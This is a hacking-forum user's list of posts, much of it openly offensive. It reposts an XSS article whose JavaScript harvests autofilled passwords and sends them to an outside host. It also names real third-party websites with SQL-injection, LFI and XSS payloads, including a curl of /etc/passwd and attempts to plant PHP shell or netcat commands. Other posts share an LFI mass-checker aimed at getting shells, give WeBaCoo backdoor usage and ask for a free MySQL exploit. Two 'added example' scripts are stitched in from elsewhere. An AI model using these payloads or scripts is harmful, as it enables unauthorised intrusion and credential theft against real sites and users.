
Topics - neusbeer

1
Hacking and Security / password AfXNtpa38x
« on: February 11, 2014, 08:02:57 pm »
I was busy pentesting IP cams and found a 'strange' thing.
I use noisy scanning with Acunetix (yeah I'm lazy), and it brute-forces about
40 passwords including this one.
Example log of an Acunetix scan: http://www.webprocomponents.com/photographer-portfolio-pro/Wildlife-portfolio1-demo/admin/attackers/94.220.67.55.log
(see the bruteforce part) note, this ain't my log ;)


When testing an IP cam, the actual password of the HTTP Auth was AfXNtpa38x.
Not really a password you see every day, and when I google it, there aren't many hits. (only a leaked pastebin with the same password in it. http://pastebin.com/2vMgHkYk)

Why does this (Dutch) IP cam have this password?


Am I missing something? Is this a standard password for IP cams of this type or some kind of built-in hardcoded password?

2
Reverse Engineering / WinICE problem
« on: May 12, 2012, 09:50:33 am »
Not sure where to put this question.


I installed WinICE, but I want to uninstall/deactivate it.
How can I do this?


If I start another program now I get a message that it won't run
because there's a debugger running.
It's on Win XP SP3; where can I find the option to switch it off?


Uninstalling WinICE doesn't work, I still get the same message from the other programs.


3
Hacking and Security / Abusing Password Managers with XSS
« on: April 26, 2012, 10:41:52 am »
First off, I didn't test it, but I find it a good article.

Abusing Password Managers with XSS
By Ben Toews

One common and effective mitigation against Cross-Site Scripting (XSS) is to set the HTTPOnly flag on session cookies.
This will generally prevent an attacker from stealing users session cookies with XSS.
There are ways of circumventing this (e.g. the HTTP TRACE method),
but generally speaking, it is fairly effective.
That being said, an attacker can still cause significant damage
without being able to steal the session cookie.

A variety of client-side attacks are possible,
but an attacker is also often able to circumvent Cross-Site Request Forgery (CSRF) protections
via XSS and thereby submit various forms within the application.
The worst case scenario with this type of attack would be that there is no
confirmation for email address or password changes and the attacker can change users' passwords.
From an attacker's perspective this is valuable,
but not as valuable as being able to steal a user's session. By resetting the password,
the attacker is giving away his presence and the extent to
which he is able to masquerade as another user is limited.
While stealing the session cookie may be the most commonly cited method for hijacking user accounts,
other means not involving changing user passwords exist.

All modern browsers come with some functionality to remember user passwords.
Additionally, users will often install third-party applications to manage their passwords for them.
All of these solutions save time for the user and generally help to prevent forgotten passwords.
Third party password managers such as LastPass are also capable of generating strong,
application specific passwords for users and then sending them off to the cloud for storage.
Functionality such as this greatly improves the overall security of the username/password authentication model.
By encouraging and facilitating the use of strong application specific passwords,
users need not be as concerned with unreliable web applications that inadequately protect their data.
For these and other reasons, password managers such as LastPass are generally
considered within the security industry to be a good idea.
I am a long time user of LastPass and have (almost) nothing but praise for their service.

An issue with both in-browser as well as third-party password managers that gets hardly
any attention is how these can be abused by XSS.
Because many of these password managers automatically fill login forms,
an attacker can use JavaScript to read the contents of the form once it has been filled.
The lack of attention this topic receives made me curious to see how exploitable it actually would be.
For the purpose of testing, I built a simple PHP application with a functional
login page as well as a second page that is vulnerable to XSS (find them here).
I then proceeded to experiment with different JavaScript, attempting to steal user
credentials with XSS from the following password managers:

LastPass (Current version as of April 2012)
Chrome (version 17)
Firefox (version 11)
Internet Explorer (version 9)
I first visited my login page and entered my password.
If the password manager asked me if I wanted it to be remembered, I said yes.
I then went to the XSS vulnerable page in my application and experimented with different JavaScript,
attempting to access the credentials stored by the browser or password manager.
I ended up writing some JavaScript that was effective against the password managers listed above with the exception of IE:

Code:
<script type="text/javascript">// <![CDATA[
    ex_username = '';
    ex_password = '';
    inter = '';
    function attack(){
        ex_username = document.getElementById('username').value;
        ex_password = document.getElementById('password').value;
        if(ex_username != '' | ex_password != ''){
            document.getElementById('xss').style.display = 'none'
            request=new XMLHttpRequest();
            url = "http://btoe.ws/pwxss?username="+ex_username+"&password="+ex_password;
            request.open("GET",url,true);
            request.send();
            document.getElementById('xss').style.visibility='hidden';
            window.clearInterval(inter);
        }
    }
    document.write("\
    <div id='xss'>\
    <form method='post' action='index.php'>\
    username:<input type='text' name='username' id='username' value='' autocomplete='on'>\
    password:<input type='password' name='password' id='password' value='' autocomplete='on'>\
    <input type='submit' name='login' value='Log In'>\
    </form>\
    </div>\
    ");
    inter = window.setInterval("attack()",100);
// ]]></script>
All that this code does is create a fake login form on the XSS vulnerable page and then wait for it to be filled in by the browser or password manager. When the fields are filled, the JavaScript takes the values and sends them off to another server via a simple Ajax request. At first I had attempted to harness the onchange event of the form fields, but it turns out that this is unreliable across browsers (also, LastPass seems to mangle the form and input field DOM elements for whatever reason).
Using window.setInterval, while less elegant, is more effective.
If you want to try out the above code,
go to http://boomer.neohapsis.com/pwxss and login (username:user1 password:secret).
Then go to the reflections page and enter the slightly modified code listed there into the text box.
If you told your password manager to remember the password for the site, you should see an alert
box with the credentials you previously entered.
Please let me know if you find any vulns aside from XSS in this app.

To be honest, I was rather surprised that my simple trick worked in Chrome and Firefox.
The LastPass plugin in the Chrome browser operates on the DOM level like any other Chrome plugin,
meaning that it can't bypass event listeners that are watching for form submissions.
The browsers, on the other hand could put garbage into the form elements in the DOM and wait until
after the onsubmit event has fired to put the real credentials into the form.
This might break some web applications that take action based on the onchange event of the form inputs,
but if that is a concern, I am sure that the browsers could somehow fill the form fields without triggering this event.

The reason why this code doesn't work in IE (aside from the non-IE-friendly XHR request)
is that the IE password manager doesn't automatically fill in user credentials.
IE also seems to be the only one of the bunch that ties a set of credentials to a specific page
rather than to an entire domain. While these both may be inconveniences from a usability perspective,
they (inadvertently or otherwise) improve the security of the password manager.

While this is an attack vector that doesn't get much attention, I think that it should.
XSS is a common problem, and developers get an unrealistic sense of security from the HTTPOnly cookie flag.
This flag is largely effective in preventing session hijacking, but user credentials may still be at risk.
While I didn't get a chance to check them out when researching this,
I would not be surprised if Opera and Safari had the same types of behavior.

I would be interested to hear a discussion of possible mitigations for this vulnerability.
If you are a browser or browser-plugin developer or just an ordinary hacker,
leave a comment and let me know what you think.

http://labs.neohapsis.com/2012/04/25/abusing-password-managers-with-xss/

4
Hacking and Security / ColdFusion (cmf) exploiting ?
« on: February 10, 2012, 01:51:29 pm »
ey,


got a site which runs on ColdFusion.
Acunetix gave me some basic vulns,
but this one is new for me..
anyone got some info about ColdFusion and the possibilities* ?


*for exploiting of course ;-)


I have gathered:
a SQL error: http://www.menninks.nl:80/index.cfm?itm_id=1e309
is injection possible?


weak password: http://www.menninks.nl:80/index.cfm?fuseaction=cms.auth
pwd=cisco&usr=Administrator

But it gives me an error page (with neat info, but what to do with it?)
and login doesn't work.


Also the Bonjour service is running. Not sure what this is, and if it is exploitable.




Oh, last thing.. MySQL 5.1.49-1ubuntu8.1 is running.
I read this week that there's a 0day exploit for this made by Canvas in their
private exploit packs (which is expensive). Is there a script/exploit for free somewhere?

5
Scripting languages / bash script find and replace (problem)
« on: February 09, 2012, 05:27:41 pm »
ok, I have a list with hash:pass
and I want to replace it in a document
(HTML in this case).


I made this script:
Code:
#!/bin/bash
# $1 file with search:replace list (one hash:pass per line)
# $2 file to check


# read the s&r list line by line; IFS=: splits each line into hash and pass
while IFS=: read -r hash pass
do
  # double quotes are needed here: inside single quotes $hash and $pass
  # were never expanded, so sed searched for the literal text "$hash"
  sed -i "s/$hash/$pass/g" "$2"
done < "$1"


but this takes forrrreeevvveerrr.. :-)


any ideas on this?


addition: It doesn't even work correctly  :o
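A single-pass variant of the script above, added here as an example and not the poster's code: it loads the hash:pass list once and does literal (non-regex) replacement in awk, so the document is read only once and passwords containing sed metacharacters such as / & . or a colon do not break the substitution. replace_hashes and demo_replace are names chosen for this example; the sample list and HTML lines are constructed.

```shell
#!/bin/bash
# Added example (not the poster's script): substitute every hash from a
# hash:pass list in a file in ONE pass, using plain string matching (awk
# index()) so that sed metacharacters in a password are harmless.
# Usage: replace_hashes LISTFILE TARGETFILE   (result goes to stdout)

replace_hashes() {
    awk -F: '
        # first file: map[hash] = pass; sub() strips "hash:" so a pass may
        # itself contain colons
        FILENAME == ARGV[1] {
            if ($1 != "") { h = $1; sub(/^[^:]*:/, ""); map[h] = $0 }
            next
        }
        # second file: literal, left-to-right replacement of every known hash
        {
            for (h in map) {
                out = ""; rest = $0
                while ((i = index(rest, h)) > 0) {
                    out = out substr(rest, 1, i - 1) map[h]
                    rest = substr(rest, i + length(h))
                }
                $0 = out rest
            }
            print
        }' "$1" "$2"
}

# Constructed sample input (not real cracked hashes): a list and an HTML table.
demo_replace() {
    local list html
    list=$(mktemp); html=$(mktemp)
    printf '%s\n' 'aaaa1111:pa/ss&w.rd' 'bbbb2222:s3cret:colon' > "$list"
    printf '%s\n' '<tr><td>aaaa1111</td><td>bbbb2222</td></tr>' \
                  '<tr><td>cccc3333</td></tr>' > "$html"
    replace_hashes "$list" "$html"
    rm -f "$list" "$html"
}
```

Redirect the output to a new file and move it over the original; unlike sed -i this never half-writes the document if the list is malformed.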

6
Hacking and Security / ClubHack Magazine's Issue-25, Feb 2012
« on: February 08, 2012, 05:25:45 pm »

ClubHack Magazine's Issue-25, Feb 2012 is released. The theme for this issue is Network Exploitation and Security.


This issue covers the following articles:-


0x00 Tech Gyan - Exploiting Remote System without Being Online
0x01 Tool Gyan - Cain and Abel: The Black Art of ARP Poisoning
0x02 Mom's Guide - Firewall 101
0x03 Legal Gyan - Liability of Intermediaries under the Information Technology Act
0x04 Matriux Vibhag - Introduction to Skipfish
0x05 Poster - "Secured Network"


Check http://chmag.in/ for articles.
The PDF version can be downloaded from:- http://chmag.in/issue/feb2012.pdf


CHMag is seeking articles for next issue. Topics:-
1. Web App Sec
2. OS Exploitation and Security
3. Cryptography and cryptanalysis


Send us your feedback, articles at info@chmag.in


Regards,
Abhijeet Patil,
Co-Founder, CHMag
http://chmag.in


Code:
wget http://chmag.in/issue/feb2012.pdf

every month they have a magazine about hacking/pentesting.
I think it's one of the best *free* magazines.


7
Security Tools / Vega
« on: February 03, 2012, 07:24:09 pm »

http://subgraph.com/vega_download.html


ABOUT VEGA
Vega is an open source platform to test the security of web applications.
Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS),
inadvertently disclosed sensitive information, and other vulnerabilities.
It is written in Java, GUI based, and runs on Linux, OS X, and Windows.


Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection.
Vega can be extended using a powerful API in the language of the web: Javascript.


Vega was developed by Subgraph in Montreal.


CORE
Automated Crawler and Vulnerability Scanner
Consistent UI
Website Crawler
Intercepting Proxy
SSL MITM
Content Analysis
Extensibility through a Powerful Javascript Module API
Customizable alerts
Database and Shared Data Model

8
Hacking and Security / LFI exploit running in the wild
« on: January 27, 2012, 09:19:35 am »
There's a 'new' LFI attack being used a lot at this moment.
Read this article http://www.devilscafe.in/2012/01/lfi-and-shell-upload-with-tamper-data.html
It's an LFI with standard /etc/passwd inclusion, and right after that a check
for /proc/self/environ.
I never heard of this 'link'.. what is it?  I know it's from Linux.. is it the
running account info on the server?
anyways it allows the use of a shell ;-)


I made a script to check the exploit on a URL list.
Input a list with /etc/passwd in the URL (example list)
and it results in a logfile with /proc/self/environ possible.
(after that tampering user-agent to get your shell up there :-))
Code:
#!/bin/bash
# $1: list of URLs that include /etc/passwd
while read -r url ; do
  test=$(curl "$url" | grep -i "root")
  if [ -z "$test" ]; then
    echo "No LFI in $url"
  else
    echo "LFI found in $url"
    echo "$url" >> output.log
  fi
done < "$1"
# retry the hits with /proc/self/environ in place of /etc/passwd
sed 's/\/etc\/passwd/\/proc\/self\/environ/g' output.log | while read -r url1 ; do
  test=$(curl "$url1" | grep -i "document_root")
  if [ -z "$test" ]; then
    echo "No /proc/self/environ in $url1"
  else
    echo "/proc/self/environ found in $url1"
    echo "$url1" >> final_list.log
  fi
done

9
Security Tools / FuzzDB
« on: January 22, 2012, 12:47:20 am »
FuzzDB

Attack and Discovery Pattern Database for Application Fuzz Testing

Code:
svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only

I overlooked this database, but it seems quite good.
It's a database with all kinds of data,
for example: webshell one-liners, standard file fuzz lists,
path traversal strings, SQLi strings, buffer overflow strings
and other useful payloads.

Quote
What's in fuzzdb?
Predictable Resource Locations - Because of the popularity of a small number of server types, platforms, and package formats, resources such as logfiles and administrative directories are typically located in a small number of predictable locations. FuzzDB contains a comprehensive database of these, sorted by platform type, language, and application, making brute force testing less brutish.

Attack Patterns - Categorized by platform, language, and attack type, malicious and malformed inputs known to cause information leakage and exploitation have been collected into sets of test cases. FuzzDB contains comprehensive lists of attack payloads known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, http header crlf injections, and more.

Response Analysis - Since system responses also contain predictable strings, fuzzdb contains a set of regex pattern dictionaries such as interesting error messages to aid detection of software security defects, lists of common Session ID cookie names, and more.

Other useful stuff - Webshells, common password and username lists, and some handy wordlists.

Documentation - Helpful documentation and cheatsheets sourced from around the web that are relevant to the payload categories are also provided.

10
Hacking and Security / FTP scan -stats-
« on: January 19, 2012, 11:16:52 pm »
FTP scan -STATS-

For those who are interested in my stats
and findings after a nice big scan of FTP

I scanned in groups of 50000 Dutch IPs with NMap.
I used -T5 to speed things up, so it may have missed some
FTP servers with slow response.

scan command / the script I used
Code:
#!/bin/bash
# $1 : infile (without .txt) output is infile + _p21.gnmap/nmap/xml
sudo nmap -v -iL "$1".txt -Pn -T5 -sV --version-all -n -p 21 -oA ~/workingdir/output/p21/"$1"_p21 --script=ftp-anon,banner,ftp-proftpd-backdoor,ftp-vsftpd-backdoor --open -sS

I scanned 105 IP lists of 5000 for this, which gives me a total of 5.250.000 IPs
(still busy, 45 to go)

Not once did I get a hit from the 2 nmap scripts which check for a backdoored FTP version

so
num IPs                    : 5.250.000 (list)
uniq IPs w/o port 21       :    41.412 (list)
   Top 5 IP groups (list)
      6963  145.216
      3442  145.217
      1642   83.162
      1194  212.204
       996   86.109
backdoored                 : 0
Found Service Info         : 142 *not much (-T5 is a fast scan with not enough waiting time)
   Top 5
      85 Service Info: OS: Unix
      27 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
       4 Service Info: Device: firewall
       3 Service Info: Device: broadband router
       2 Service Info: OS: VxWorks; CPE: cpe:/o:windriver:vxworks

FTP anonymous access       : 1765 *successful logins with user:anonymous pass:anon@

also the scan did a banner grab (a short one because of the T5 option of NMap)
Banner grabbed             : 20457 (almost 50% of the open ports found) (link)
   Return codes top 3
     20190 220
        62 530
        46 550

   ProFTPD                 :  5308 (1/4 of all the banners)
   Top 5 versions
       621 ProFTPD 1.3.1 Server
       368 ProFTPD 1.3.3c Server
       355 ProFTPD 1.3.2e Server
       240 ProFTPD 1.3.3e Server
       141 ProFTPD 1.3.3a Server
   vsFTPD                  :  1653
   Top 5 versions
       907 (vsFTPd 2.0.5)
       205 (vsFTPd 2.0.7)
       122 (vsFTPd 2.3.2)
       119 (vsFTPd 2.2.2)
        68 (vsFTPd 2.0.1)
   FileZilla               :   710
   Top 5 versions
       168 FileZilla Server version 0.9.37 beta
       142 FileZilla Server version 0.9.39 beta
        83 FileZilla Server version 0.9.40 beta
        72 FileZilla Server version 0.9.34 beta
        41 FileZilla Server version 0.9.33 beta
   VxWorks                 :    99
   Top 5 versions
        69 VxWorks (VxWorks5.4.2) FTP server ready
        17 Tornado-vxWorks (VxWorks5.4.2) FTP server ready
         9 VxWorks (5.4.2) FTP server ready
         2 VxWorks (VxWorks5.5.1) FTP server ready
         1 VxWorks FTP server (VxWorks 5.4.2) ready.
   NASFTP                  :   359
      Turbo                :   350
         277 Turbo station 2.x 1.3.2e Server
          73 Turbo station 2.x 1.3.1rc2 Server
      3.x Server           :     9
   Serv-U                  :   139
   Top 5 versions
        29 v6.4
        16 v6.0
        14 v11.1
        11 v6.2
         8 v6.3

   FTP Server ready.       :  2469


some other stats
   NAS found               :   615
   Microsoft FTP Service   :  1805
   FritzBox                :    86
   'welcome' in banner     :  3116
   'ready' in banner       :  8792
   service not available   :    33
   Cisco                   :    23
   P2612HW                 :    62 *ZyXEL Router
   cameras                 :    47 *39 AXIS
   DreamBox                :   197
   Moxa FTP                :    13
   DSL Router              :    30
   DiskStation             :   255
   Check Point Firewall    :   119
   TCAdmin                 :    40
   Winsock ready...        :    93
   Gene6                   :    54
   spftp                   :    38
   ucftpd                  :    20
   FTP-Uploadserver        :    61
   WAR-FTPD                :     7
   BulletProof FTP         :    27
   Titan FTP               :    14
   zFTPServer              :    20
   Cerberus                :    22
   Rumpus                  :    37
   JD FTP                  :    33
   Card AOS                :    68
   pd-admin                :     6
   Welcome to the CS network :  25  ? so many
   Netwerkschijf           :     7 *Dutch for "disk drive"
   Inactivity timer text   :    72
   Connection refused, unknown IP address :  59
   IP in banner            :  3859

   
Why do I make stats?
It can be handy with pentesting!
For example, knowing that the word 'welcome' isn't used often (+/- 25%)
and 'ready' doesn't reach 50% means that a scanner based on return strings
isn't the best idea.
Or you see that the versions of the most used FTP servers aren't the latest
version: 1.3.1 for ProFTPD and 2.0.5 for vsFTPd, and googling around brings
a lot of exploits based on these versions.
Serv-U 6.4 is most used, and a lot of exploits are on the net.
(Dir traversal, BoF's, Auth. bypass).
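An added example, not the poster's script, for turning scan output into the kind of version counts listed above: it parses the .gnmap file that the -oA option writes and tallies the -sV version string for every host with port 21 open, which is just as useful for inventorying your own FTP servers before the next ProFTPD or vsFTPd advisory lands. ftp_version_stats and demo_stats are names chosen here; the sample .gnmap lines are constructed.

```shell
#!/bin/bash
# Added example (not the poster's script): tally the FTP server versions nmap
# reported, reading the .gnmap file written by -oA. Each host line looks like
# (constructed, tab-separated fields):
#   Host: 10.0.0.5 ()<TAB>Ports: 21/open/tcp//ftp//ProFTPD 1.3.1/<TAB>Ignored State: closed (0)
# and each port entry is port/state/proto/owner/service/rpc/version/.
# Usage: ftp_version_stats FILE.gnmap  -> "count version" lines, most common first

ftp_version_stats() {
    awk -F'\t' '/Ports: / {
        for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
        n = split(ports, entry, ", ")
        for (j = 1; j <= n; j++) {
            split(entry[j], f, "/")
            # only open port 21; field 7 is the -sV version string (may be empty)
            if (f[1] == "21" && f[2] == "open")
                print (f[7] == "" ? "<no version>" : f[7])
        }
    }' "$1" | sort | uniq -c | sort -rn | sed 's/^ *//'
}

# Constructed sample .gnmap (not from the real scan) to exercise the parser:
# two ProFTPD hosts, one vsFTPd, one host without port info, one open port
# where -sV returned no version.
demo_stats() {
    local f
    f=$(mktemp)
    printf 'Host: 10.0.0.5 ()\tPorts: 21/open/tcp//ftp//ProFTPD 1.3.1/\tIgnored State: closed (0)\n' > "$f"
    printf 'Host: 10.0.0.6 ()\tPorts: 21/open/tcp//ftp//vsFTPd 2.0.5/\tIgnored State: closed (0)\n' >> "$f"
    printf 'Host: 10.0.0.7 ()\tPorts: 21/open/tcp//ftp//ProFTPD 1.3.1/\tIgnored State: closed (0)\n' >> "$f"
    printf 'Host: 10.0.0.8 ()\tStatus: Up\n' >> "$f"
    printf 'Host: 10.0.0.9 ()\tPorts: 21/open/tcp//ftp///\tIgnored State: closed (0)\n' >> "$f"
    ftp_version_stats "$f"
    rm -f "$f"
}
```

Point it at the real output with ftp_version_stats ~/workingdir/output/p21/LIST_p21.gnmap; hosts scanned with -T5 that answered too slowly simply show up under "<no version>".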


11
Hacking and Security / packetstormsecurity.org closed for today
« on: January 18, 2012, 06:39:15 am »
First one that shut down today.....
(Glad I have all their exploits on my hdd  ;D )





12
Hacking and Security / xss scripting problem
« on: January 14, 2012, 11:55:13 am »
I'm kinda stuck here..
There's a new exploit
http://www.exploit-db.com/exploits/18355/

have a target:
http://www.unrequited-love.com/

the XSS with the picture loading, as the example shows, works.
Code:
http://www.unrequited-love.com/blog/wp-content/plugins/count-per-day/map/map.php?map='%22));%20%3C/script%3E%3Cimg%20src=http://www.bing.com//az/hprichbg?p=rb%2fOrcaWhales_ROW818916751.jpg%3E'
This brings a nice picture of a whale.

But I want to inject PHP or JS script. How can I manage that?
I've tried everything..  :o
I'd like to add
Quote
<?php passthru($_POST['cat /etc/passwd']); __halt_compiler();
or similar, or c99 (or another shell) or a netcat command. anything..
except a picture .. *sigh*



the local file inclusion works like a charm (Note: a lot have deleted download.php)
Code:
curl "http://www.armandocruz.com/wp-content/plugins/count-per-day/download.php?n=1&f=../../../../../../etc/passwd"
gives the data of /etc/passwd (but it has shadow.. so useless :P)

13
Scripting languages / bash pipe problem
« on: January 13, 2012, 05:35:51 pm »
(not sure if this is the right place to ask)


I have a small problem with pipes in Linux.


case:
I have a script which outputs an IP address for me and I want to pipe it to whatweb.


The script is a simple way to output the IP of a domain.
so I tried


getip domain.com | whatweb


but whatweb doesn't get the IP which is given by the script 'getip'.
do I need to put a variable after whatweb
like - or "$1" or something?
Kinda stuck here,...

14
Security Tools / WeBaCoo
« on: January 11, 2012, 08:26:17 pm »
Web Backdoor Cookie Script-Kit

Get your freshly made script onto the server and call it from your bash.
Result: a nice bash shell which communicates through a cookie.
*site must have cookies enabled.

Install:
git clone git://github.com/anestisb/WeBaCoo.git
or
wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz

$ ./webacoo.pl -h
WeBaCoo 0.2 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

Usage: webacoo.pl [options]

Options:
 -g            Generate backdoor code (-o is required)
 -f FUNCTION   PHP System function to use FUNCTION
                 1: system       (default)
                 2: shell_exec
                 3: exec
                 4: passthru
                 5: popen
 -o OUTPUT     Generated backdoor output filename
 -r            Return un-obfuscated backdoor code
 -t            Establish remote "terminal" connection (-u is required)
 -u URL        Backdoor URL
 -c C_NAME     Cookie name (default: "M-cookie")
 -d DELIM      Delimiter (default: New random for each request)
 -a AGENT      HTTP header user-agent (default exist)
 -p PROXY      Use proxy (tor, ip:port or user:pass:ip:port)
 -v LEVEL      Verbose level LEVEL
                 0: no additional info (default)
                 1: print HTTP headers
                 2: print HTTP headers + data
 -h            Display help and exit
 update        Check for updates and apply if any

So create shell:
./webacoo.pl -g -f 5 -o shell_popen.php -c 'cookie named which site uses'

get that thing on their server and run:

./webacoo.pl -t -u http://site/link_to/shell_popen.php

Of course there are other ways. But this one fits my needs sometimes.
(last night I didn't have a server with netcat installed).

15
Security Tools / scritch.org
« on: January 11, 2012, 08:18:30 pm »
CMS identification and other HTML identification tools.
I use this as a bookmark in my browser.


Make a bookmark,
text: CMS
URL: javascript:(function(){window.open('http://guess.scritch.org/?url='+encodeURIComponent(document.location),'Guess')})()


When I want to quickly detect the CMS or PHP version I use this.


example output:


